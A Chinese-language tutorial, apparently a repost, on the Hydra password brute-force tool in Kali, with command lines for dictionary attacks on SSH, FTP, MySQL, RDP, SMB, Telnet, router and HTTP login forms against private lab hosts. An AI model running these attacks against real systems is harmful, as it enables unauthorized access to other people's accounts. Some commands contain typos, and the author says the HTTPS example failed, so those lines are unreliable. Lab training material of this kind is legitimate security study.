1.Hydra簡(jiǎn)介

1.1.Hydra介紹

??hydra（九頭蛇）是著名黑客組織thc的一款開(kāi)源的暴力破解密碼工具，功能非常強(qiáng)大，kali下是默認(rèn)安裝的，幾乎支持所有協(xié)議的在線破解。密碼能否破解，在于字典是否強(qiáng)大。

1.2.Hydra支持協(xié)議

??Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP。

1.3.Hydra下載

??至于Hydra下載在kail中是自帶了，這里就不進(jìn)行安裝了，感興趣的可以去項(xiàng)目地址看看。
??項(xiàng)目地址：Hydra

2.Hydra使用

2.1.Hydra基本使用方式

使用語(yǔ)法：hydra 參數(shù) IP地址 服務(wù)名
幫助命令：hydra -h
常用命令：hydra [-l 用戶名|–L 用戶名文件路徑] [-p 密碼|–P 密碼文件路徑] [-t 線程數(shù)] [–vV 顯示詳細(xì)信息] [–o 輸出文件路徑] [–f 找到密碼就停止] [–e ns 空密碼和指定密碼試探] [ip|-M ip列表文件路徑]

2.2.Hydra常用參數(shù)

2.3.Hydra注意事項(xiàng)

??1.server：指定目標(biāo)IP。
??2.service：指定服務(wù)名，支持的服務(wù)跟協(xié)議有：telnet，ftp，pop3等等。
??3.自己創(chuàng)建字典,然后放在當(dāng)前的目錄下或者指定目錄。
??4.參數(shù)可以統(tǒng)一放在最后，格式比如hydra ip 服務(wù) 參數(shù)。
??5.如果能確定用戶名一項(xiàng)時(shí)候，比如web登錄破解，直接用 -l就可以，然后剩余時(shí)間破解密碼。
??6.缺點(diǎn)就是如果目標(biāo)網(wǎng)站登錄時(shí)候需要驗(yàn)證碼就無(wú)法破解。

2.4.Kail字典

??在kail中是自帶字典的，可以通過(guò)/usr/share/wordlists/dirb路徑進(jìn)行查看，當(dāng)然都是txt文件，也可以自己向里面添加。

2.5.Hydra密碼生成器

3.Hydra案例

3.1.創(chuàng)建賬號(hào)密碼文件

??這里由于自己搭建的靶場(chǎng)密碼都挺復(fù)雜的，通常爆破的可能不大，這里就手創(chuàng)建幾個(gè)賬號(hào)和密碼進(jìn)行測(cè)試。

3.2.SSH協(xié)議爆破

3.2.1.靶機(jī)信息

??Kail攻擊機(jī)：192.168.10.20
??centos7靶機(jī)：192.168.10.30

3.2.2.開(kāi)始爆破

3.2.2.1.不知賬號(hào)

??這里我是用我指定的賬號(hào)密碼文件進(jìn)行破解，如果像我一樣自己創(chuàng)建賬號(hào)密碼進(jìn)行破解，那么你在那個(gè)目錄下創(chuàng)建的就需要在那個(gè)目錄下操作，否則就需要加上絕對(duì)路徑，并且我這里設(shè)置的線程很少，如果你感覺(jué)慢，那么可以使用多一點(diǎn)的線程來(lái)跑字典。

命令：hydra -L user.txt -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ssh

3.2.2.2.知道賬號(hào)

??若知道賬號(hào)了，比如root，那么可以直接指定賬號(hào)配合密碼字典來(lái)測(cè)試，會(huì)更快。

命令：hydra -l root -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ssh 

3.3.FTP協(xié)議爆破

??由于FTP協(xié)議爆破和SSH協(xié)議爆破基本一致，這里就演示具體的爆破手法了，直接放命令吧。

不知賬號(hào)命令：hydra -L user.txt -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ftp 
知道賬號(hào)命令：hydra -l root -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ftp

3.4.數(shù)據(jù)庫(kù)爆破

3.4.1.靶機(jī)信息

??Kail攻擊機(jī)：192.168.10.20
??windows10靶機(jī)：192.168.10.150

3.4.2.開(kāi)始爆破

??這里我也不分知不知道賬號(hào)了，這里假設(shè)我們知道賬號(hào)是root。

命令：hydra -l root -P passwd.txt -t 6 -vV -e ns 192.168.10.150 mysql

3.5.遠(yuǎn)程桌面爆破

3.5.1.靶機(jī)信息

??Kail攻擊機(jī)：192.168.10.20
??windows10靶機(jī)：192.168.10.150

3.5.2.開(kāi)始爆破

??遠(yuǎn)程桌面爆破這里可以設(shè)定用戶名也可以不設(shè)定用戶名，我在爆破測(cè)試的時(shí)候，發(fā)現(xiàn)當(dāng)爆破出賬號(hào)密碼后，會(huì)繼續(xù)爆破，但是會(huì)出報(bào)錯(cuò)，暫時(shí)不知道情況，不知道是不是為了爆破出更多的賬號(hào)密碼。
這里我也不區(qū)分有沒(méi)有賬號(hào)了。

命令：hydra -L user.txt -P passwd.txt -t 6 -vV -e ns 192.168.10.150 rdp 

3.6.HTTP協(xié)議爆破

3.6.1.靶機(jī)信息

??Kail攻擊機(jī)：192.168.10.20
??windows10靶機(jī)：192.168.10.150
??頁(yè)面地址：/pikachu/vul/burteforce/bf_form.php

3.6.2.開(kāi)始爆破

??在HTTP協(xié)議中存在POST與GET方式進(jìn)行提交。

3.6.2.1.POST方式爆破

命令：hydra -l admin -P passwd.txt -t 6 -vV -e ns 192.168.10.150 http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=login:username or password is nois not exists～" 

??解釋：后面的http-post-form是定義在http中使用post進(jìn)行提交，后面的/pikachu/vul/burteforce/bf_form.php是訪問(wèn)的URL，而且后面的username與password是根據(jù)抓包獲取到的格式，至于里面的^USER和^PASS是固定格式，再后面的login是報(bào)錯(cuò)信息。

3.6.2.2.GET方式爆破

??這里其實(shí)格式和post差不多，都可以一樣使用，只需要修改提交類型即可。

命令：hydra -L user.txt -P passwd.txt -t 6 -vV -e ns 192.168.10.50 http-get /phpMyAdmin/ 

??解釋：后面的http-get是定義在http中使用什么提交方式進(jìn)行爆破，而后面的//phpMyAdmin/指的是URL的訪問(wèn)連接，例如：你的登錄頁(yè)面是admin/index.php，那么后面就要更改為/admin/index.php

3.7.其它爆破

??由于我這邊沒(méi)有實(shí)際的案例，無(wú)法進(jìn)行測(cè)試。

3.7.1.HTTPS爆破

??下面這個(gè)命令，是我在搜索中發(fā)現(xiàn)基本上是一致的，然而我式了一下，Hydra直接報(bào)錯(cuò)，提示無(wú)https協(xié)議。正確暫時(shí)我還沒(méi)有測(cè)試出來(lái)，后面我再找找相關(guān)的命令，測(cè)試出來(lái)，我再添加上去。

命令：hydra -m /index.php -l 用戶名 -P 密碼字典.txt IP地址 https

3.7.2.路由器爆破

??路由器爆破，通常默認(rèn)管理密碼都是一串10位左右的各種大小寫(xiě)加特殊字符組成。而這里對(duì)路由器爆破就用枚舉生成進(jìn)行爆破。

命令：hydra -l admin -x 6:10:1aA.~!@#$%^&()-= -t 6 -vV -e ns 192.168.10.50 http-get /

??解釋：-x是后面的是代表自動(dòng)生成6到10位由大小寫(xiě)數(shù)字+特殊字符組成的密碼。

3.7.3.SMB爆破

命令：hydra -L user.txt P passwd.txt -t 6 -vV -e ns 192.168.10.50 smb

3.7.4.TELNET爆破

命令：hydra -L user.txt P passwd.txt -t 6 -vV -e ns 192.168.10.50 telnet

3.8其它

??這里的協(xié)議不是很全，若需要其它的可自行百度搜索。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-787286.html

到了這里，關(guān)于Hydra(九頭蛇)工具使用的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！